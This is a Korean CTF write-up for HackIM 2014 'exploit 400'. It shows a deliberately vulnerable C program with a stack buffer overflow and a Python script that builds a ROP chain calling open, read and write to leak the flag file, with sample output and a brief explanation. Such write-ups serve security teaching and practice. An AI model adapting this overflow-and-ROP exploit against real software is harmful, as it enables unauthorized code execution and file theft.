[exploit] hackim 2014 exploit 400

<문제 코드>

include <unistd.h> #include <stdlib.h> #include <stdio.h> #include <string.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #define STACK 64 #define HEAP 64 #define FLAG "./flag" /* gcc -masm=intel -z norelro -fno-stack-protector -o chall_heap chall_heap.c */ const char *malloc_error = "Memory allocation failed!\n"; const char *file_error = "Opening flag failed!\n"; const char *pwn = "Good Enough? Pwn Me!\n"; void main(int argc, char **argv) { char *flag; int fd; char user[STACK]; flag = malloc(HEAP); if (flag == NULL) { write(1, malloc_error, strlen(malloc_error)); exit(1); } fd = open(FLAG ,O_RDONLY); if (fd < 0){ write(1, file_error, strlen(file_error)); exit(1); } if(setresuid(getuid(), getuid(), getuid()) < 0){ exit(1); } read(fd, flag, HEAP-1); close(fd); write(1, pwn, strlen(pwn)); read(0, user, 0x800); asm (".intel_syntax noprefix;" "xor eax, eax;" "xor ebx, ebx;" "xor ecx, ecx;" "xor esi, esi;" "xor edi, edi;" ); }

<exploit.py>

#!/usr/bin/env python import socket import struct p = lambda x: struct.pack("<L", x) flag = 0x80487c7 fopen = 0x8048420 read = 0x80483d0 write= 0x8048440 pppr = 0x80486a7 ppr = 0x80486a8 ret = 0x80486aa buf = 0x80499ec size = 0x3f payload = "a" * 0x64 for fd in 3,4,5,6,7,8: payload += p(fopen) payload += p(ppr) payload += p(flag) payload += p(0x00) payload += p(read) payload += p(pppr) payload += p(fd) payload += p(buf) payload += p(size) payload += p(write) payload += p(pppr) payload += p(0x1) payload += p(buf) payload += p(size) f = open("ex400.txt", "wb") f.write(payload) f.close() ''' root@kali:~/Desktop# (cat ex400.txt)|./chall_heap Good Enough? Pwn Me! The flag is "6683cbc8585691f779f2785344fcbfae" The flag is "6683cbc8585691f779f2785344fcbfae" The flag is "6683cbc8585691f779f2785344fcbfae" The flag is "6683cbc8585691f779f2785344fcbfae" The flag is "6683cbc8585691f779f2785344fcbfae" The flag is "6683cbc8585691f779f2785344fcbfae" Segmentation fault root@kali:~/Desktop# '''

서버가 닫힌 후 풀이해본거라 서버에서 작동될지는 모르겠네요.(flag값은 제가 임의로 넣은거에요 ㅎㅎ)

그냥 단순 BOF로 ret 값을 제어할수 있습니다.

open("./flag") -> read(buf) -> write(buf)

ret값으로 파일을 다시 열고 내용을 buf로 읽어 들입니다. 마지막으로 write로 buf값을 출력하면 flag가 나옵니다.